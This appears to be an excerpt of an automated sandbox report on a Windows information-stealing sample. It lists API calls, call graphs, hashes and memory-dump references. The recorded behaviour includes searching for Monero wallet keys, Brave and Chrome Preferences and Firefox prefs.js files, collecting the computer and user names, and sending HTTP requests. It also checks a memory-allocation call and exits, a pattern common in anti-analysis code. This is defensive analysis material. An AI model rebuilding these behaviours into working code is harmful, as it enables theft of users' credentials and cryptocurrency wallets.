                    Yara matches
                    Similarity
                    • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                    • String ID: @
                    • API String ID: 3404098578-2766056989
                    • Opcode ID: c31e00f296cf2d401d5a41a2ba55288bee3dc93a0eb14f9cc1c2c1ac7344fdb7
                    • Instruction ID: c23ab2d808566809ca7d92aef62718bc09f2aec2469a4f98cf831cef39851898
                    • Opcode Fuzzy Hash: c31e00f296cf2d401d5a41a2ba55288bee3dc93a0eb14f9cc1c2c1ac7344fdb7
                    • Instruction Fuzzy Hash: 4A014FB0940308AAEB10EFD4CC49FADB7B8AB05701F248499E705BA281D67455458799

                    Control-flow Graph (rendered as an image in the original; basic blocks and edges recovered from it)
                    • 1450: bd6af3; edge to 1451
                    • 1451: bd6b0a; edges to 1453, 1454
                    • 1453: bd6b0c-bd6b22, call bd6920, call bd5b10, CloseHandle, ExitProcess
                    • 1454: bd6aba-bd6ad7, call bdaad0, OpenEventA; edges to 1459, 1460
                    • 1459: bd6ad9-bd6af1, call bdaad0, CreateEventA; edge to 1453
                    • 1460: bd6af5-bd6b04, CloseHandle, Sleep; edge to 1451
                    APIs
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,013C8F18,?,00BE110C,?,00000000,?,00BE1110,?,00000000,00BE0AEF), ref: 00BD6ACA
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD6AE8
                    • CloseHandle.KERNEL32(00000000), ref: 00BD6AF9
                    • Sleep.KERNEL32(00001770), ref: 00BD6B04
                    • CloseHandle.KERNEL32(?,00000000,?,013C8F18,?,00BE110C,?,00000000,?,00BE1110,?,00000000,00BE0AEF), ref: 00BD6B1A
                    • ExitProcess.KERNEL32 ref: 00BD6B22
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                    • String ID:
                    • API String ID: 941982115-0
                    • Opcode ID: 6c5f86b30a82e76cc8359ad0d931f94a97c0be1aab24bc5cb8bddd322e01b784
                    • Instruction ID: 3e9cae4096ed91729a99bdd7a214aff9d2df0b223d334994e4788e689bd18a75
                    • Opcode Fuzzy Hash: 6c5f86b30a82e76cc8359ad0d931f94a97c0be1aab24bc5cb8bddd322e01b784
                    • Instruction Fuzzy Hash: 0EF05E3094031DAFEB10ABA0DC4ABBDFBB4EB04701F1485A7F502B12C1FBB15584D666

                    Control-flow Graph

                    APIs
                    • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BC4839
                    • InternetCrackUrlA.WININET(00000000,00000000), ref: 00BC4849
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CrackInternetlstrlen
                    • String ID: <
                    • API String ID: 1274457161-4251816714
                    • Opcode ID: 11b9ed65820bc1b8ff95fb03bd1ca6311a4b3f795c92fd61542477401d6e7072
                    • Instruction ID: 4007ab9d7b36ad027c293f8d2fe341dd1c98c3f3b6077033ff76fcefb1c1b953
                    • Opcode Fuzzy Hash: 11b9ed65820bc1b8ff95fb03bd1ca6311a4b3f795c92fd61542477401d6e7072
                    • Instruction Fuzzy Hash: 15213EB1D00209ABDF14DFA4E845ADEBB75FB45320F148626F919B7281EB706A09CB81

                    Control-flow Graph

                    APIs
                      • Part of subcall function 00BDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BDA7E6
                      • Part of subcall function 00BC6280: InternetOpenA.WININET(00BE0DFE,00000001,00000000,00000000,00000000), ref: 00BC62E1
                      • Part of subcall function 00BC6280: StrCmpCA.SHLWAPI(?,013CEA08), ref: 00BC6303
                      • Part of subcall function 00BC6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BC6335
                      • Part of subcall function 00BC6280: HttpOpenRequestA.WININET(00000000,GET,?,013CDFD8,00000000,00000000,00400100,00000000), ref: 00BC6385
                      • Part of subcall function 00BC6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BC63BF
                      • Part of subcall function 00BC6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BC63D1
                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00BD5228
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                    • String ID: ERROR$ERROR
                    • API String ID: 3287882509-2579291623
                    • Opcode ID: 34d881ca648f76b85ecacf2dd8798ef38151e29e6ab1434698f25b40448d6000
                    • Instruction ID: bf1f397b3ebe5fac10014336a49afc88a082dea2c68acd287c3f66cc8b2f08a8
                    • Opcode Fuzzy Hash: 34d881ca648f76b85ecacf2dd8798ef38151e29e6ab1434698f25b40448d6000
                    • Instruction Fuzzy Hash: ED110030910148ABCB14FF64DD92EEDB3B8AF50300F9045E9F81A5A692FF71AB09D695
                    APIs
                    • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BC112B
                    • VirtualAllocExNuma.KERNEL32(00000000), ref: 00BC1132
                    • ExitProcess.KERNEL32 ref: 00BC1143
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$AllocCurrentExitNumaVirtual
                    • String ID:
                    • API String ID: 1103761159-0
                    • Opcode ID: cad329dd4d218c8fc5cce0e71df3ffe7aa4ee5500b541b1750e2f80be8766fa3
                    • Instruction ID: 221d1bdbd6de6f9f22af6cde873b392cb4a76c78ba3981bef72262b1791d1e71
                    • Opcode Fuzzy Hash: cad329dd4d218c8fc5cce0e71df3ffe7aa4ee5500b541b1750e2f80be8766fa3
                    • Instruction Fuzzy Hash: 7CE08670A4530CFFE7106BA59C0EF0876B8EB04B01F144094F708761C1C6B526449699
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00BC10B3
                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00BC10F7
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Virtual$AllocFree
                    • String ID:
                    • API String ID: 2087232378-0
                    • Opcode ID: 2db1cb8e4ce9123687c29130bcbeb610f7ba281332e25d94372e4b454098edf4
                    • Instruction ID: f19a4c03489d97793556bb994a1307da4e7d1d786e922e0e3a3ba8c148d57e81
                    • Opcode Fuzzy Hash: 2db1cb8e4ce9123687c29130bcbeb610f7ba281332e25d94372e4b454098edf4
                    • Instruction Fuzzy Hash: 69F05271640308BBE7049AA8AC59FAAB3E8E305B11F301888F500F3280D5329E40CAA1
                    APIs
                      • Part of subcall function 00BD78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BD7910
                      • Part of subcall function 00BD78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BD7917
                      • Part of subcall function 00BD78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00BD792F
                      • Part of subcall function 00BD7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BC11B7), ref: 00BD7880
                      • Part of subcall function 00BD7850: RtlAllocateHeap.NTDLL(00000000), ref: 00BD7887
                      • Part of subcall function 00BD7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BD789F
                    • ExitProcess.KERNEL32 ref: 00BC11C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                    • String ID:
                    • API String ID: 3550813701-0
                    • Opcode ID: 8b81f11bdd134a86806c2f7160ab577535806496608ade734376b4a1a0c65519
                    • Instruction ID: 04f2f5291b7fbfdab81eea049d1c8fc9455b43578557fa3229cb32ffb4cd223b
                    • Opcode Fuzzy Hash: 8b81f11bdd134a86806c2f7160ab577535806496608ade734376b4a1a0c65519
                    • Instruction Fuzzy Hash: CBE0ECA595430556CA0073BAAC0AB2A76DC9B1534AF0C08AAFA05B2243FE2BE8448566
                    APIs
                    • wsprintfA.USER32 ref: 00BD38CC
                    • FindFirstFileA.KERNEL32(?,?), ref: 00BD38E3
                    • lstrcat.KERNEL32(?,?), ref: 00BD3935
                    • StrCmpCA.SHLWAPI(?,00BE0F70), ref: 00BD3947
                    • StrCmpCA.SHLWAPI(?,00BE0F74), ref: 00BD395D
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BD3C67
                    • FindClose.KERNEL32(000000FF), ref: 00BD3C7C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                    • API String ID: 1125553467-2524465048
                    • Opcode ID: b5389fb86154d012d5e60e35aa188a9f7aba73547bcf438cf011e3953d147f08
                    • Instruction ID: e53de401e3259d7a43e6a5d29770402c565776a59ebddaff84e73be42a9d36db
                    • Opcode Fuzzy Hash: b5389fb86154d012d5e60e35aa188a9f7aba73547bcf438cf011e3953d147f08
                    • Instruction Fuzzy Hash: D8A12171A103189FDB24EB65DC85FEE73B8FB44700F0845D9A509A6141EB759B88CFA2
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • FindFirstFileA.KERNEL32(00000000,?,00BE0B32,00BE0B2B,00000000,?,?,?,00BE13F4,00BE0B2A), ref: 00BCBEF5
                    • StrCmpCA.SHLWAPI(?,00BE13F8), ref: 00BCBF4D
                    • StrCmpCA.SHLWAPI(?,00BE13FC), ref: 00BCBF63
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BCC7BF
                    • FindClose.KERNEL32(000000FF), ref: 00BCC7D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                    • API String ID: 3334442632-726946144
                    • Opcode ID: 42b117eda1e5ac73de6afdcd759664883b1a220039a5b63c83e06f0b3e4fa1a1
                    • Instruction ID: 8c7fffa5c474cd22252f7acb3b251188debee5007af8462f720c75ec8ef63ae5
                    • Opcode Fuzzy Hash: 42b117eda1e5ac73de6afdcd759664883b1a220039a5b63c83e06f0b3e4fa1a1
                    • Instruction Fuzzy Hash: F44243729101089BCB14FB70DC96EEDB3BCAB54300F4045E9F90AA6291FE359F49CB96
                    APIs
                    • wsprintfA.USER32 ref: 00BD492C
                    • FindFirstFileA.KERNEL32(?,?), ref: 00BD4943
                    • StrCmpCA.SHLWAPI(?,00BE0FDC), ref: 00BD4971
                    • StrCmpCA.SHLWAPI(?,00BE0FE0), ref: 00BD4987
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BD4B7D
                    • FindClose.KERNEL32(000000FF), ref: 00BD4B92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s$%s\%s$%s\*
                    • API String ID: 180737720-445461498
                    • Opcode ID: e4f54af50c9d9357a074d626f89c35ac5805bcc69167709a393652a57e4d1b75
                    • Instruction ID: fbbf502be47c641775942f46d4c942665005651155169f2574432d67f75637e0
                    • Opcode Fuzzy Hash: e4f54af50c9d9357a074d626f89c35ac5805bcc69167709a393652a57e4d1b75
                    • Instruction Fuzzy Hash: 996144B1510218AFCB24EBA1DC49FEA73BCFB58700F0485D9B509A6141EB75DB89CFA1
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BD4580
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BD4587
                    • wsprintfA.USER32 ref: 00BD45A6
                    • FindFirstFileA.KERNEL32(?,?), ref: 00BD45BD
                    • StrCmpCA.SHLWAPI(?,00BE0FC4), ref: 00BD45EB
                    • StrCmpCA.SHLWAPI(?,00BE0FC8), ref: 00BD4601
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BD468B
                    • FindClose.KERNEL32(000000FF), ref: 00BD46A0
                    • lstrcat.KERNEL32(?,013CE9A8), ref: 00BD46C5
                    • lstrcat.KERNEL32(?,013CD760), ref: 00BD46D8
                    • lstrlen.KERNEL32(?), ref: 00BD46E5
                    • lstrlen.KERNEL32(?), ref: 00BD46F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                    • String ID: %s\%s$%s\*
                    • API String ID: 671575355-2848263008
                    • Opcode ID: 7d328a28b13d0fad1feec0d074913b5bfc18aaab360e891c30d42ad9ac86b7f0
                    • Instruction ID: dac94d5308f87b5af8db3a7396accfb29b8a28cfb4d6bc5d87e904d199f1ea4b
                    • Opcode Fuzzy Hash: 7d328a28b13d0fad1feec0d074913b5bfc18aaab360e891c30d42ad9ac86b7f0
                    • Instruction Fuzzy Hash: CB5143B555021C9FC724EB70DC89FEDB3BCAB54300F4445D9B609A2150EB75DAC88FA1
                    APIs
                    • wsprintfA.USER32 ref: 00BD3EC3
                    • FindFirstFileA.KERNEL32(?,?), ref: 00BD3EDA
                    • StrCmpCA.SHLWAPI(?,00BE0FAC), ref: 00BD3F08
                    • StrCmpCA.SHLWAPI(?,00BE0FB0), ref: 00BD3F1E
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BD406C
                    • FindClose.KERNEL32(000000FF), ref: 00BD4081
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s
                    • API String ID: 180737720-4073750446
                    • Opcode ID: c7ac9fc45f8d75677772335ff6074ded5338e0b02be74bbd82d33404ac1f4f62
                    • Instruction ID: c97449cdcb1118e6083e409d3a586e2d9ab80a4758effb7f846e9814c2469ac3
                    • Opcode Fuzzy Hash: c7ac9fc45f8d75677772335ff6074ded5338e0b02be74bbd82d33404ac1f4f62
                    • Instruction Fuzzy Hash: E15179B5500218ABCB24FBB0DC85EEDB3BCBB54300F0485D9B659A2141EB75DB898FA1
                    APIs
                    • wsprintfA.USER32 ref: 00BCED3E
                    • FindFirstFileA.KERNEL32(?,?), ref: 00BCED55
                    • StrCmpCA.SHLWAPI(?,00BE1538), ref: 00BCEDAB
                    • StrCmpCA.SHLWAPI(?,00BE153C), ref: 00BCEDC1
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BCF2AE
                    • FindClose.KERNEL32(000000FF), ref: 00BCF2C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\*.*
                    • API String ID: 180737720-1013718255
                    • Opcode ID: 0c741df59fc129c8028811c2bc605827b63c51387a97fdaf6b07735e57c95f31
                    • Instruction ID: 4c9d940f4c2bf9c3fd8dbcecae7558c92d095c1a3301a7aa0415fa90253a3f39
                    • Opcode Fuzzy Hash: 0c741df59fc129c8028811c2bc605827b63c51387a97fdaf6b07735e57c95f31
                    • Instruction Fuzzy Hash: 8BE104719111589ADB54FB60CC92EEEB3BCAF54300F4045EAB40A62192FF316F8ADF56
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BE15B8,00BE0D96), ref: 00BCF71E
                    • StrCmpCA.SHLWAPI(?,00BE15BC), ref: 00BCF76F
                    • StrCmpCA.SHLWAPI(?,00BE15C0), ref: 00BCF785
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BCFAB1
                    • FindClose.KERNEL32(000000FF), ref: 00BCFAC3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: prefs.js
                    • API String ID: 3334442632-3783873740
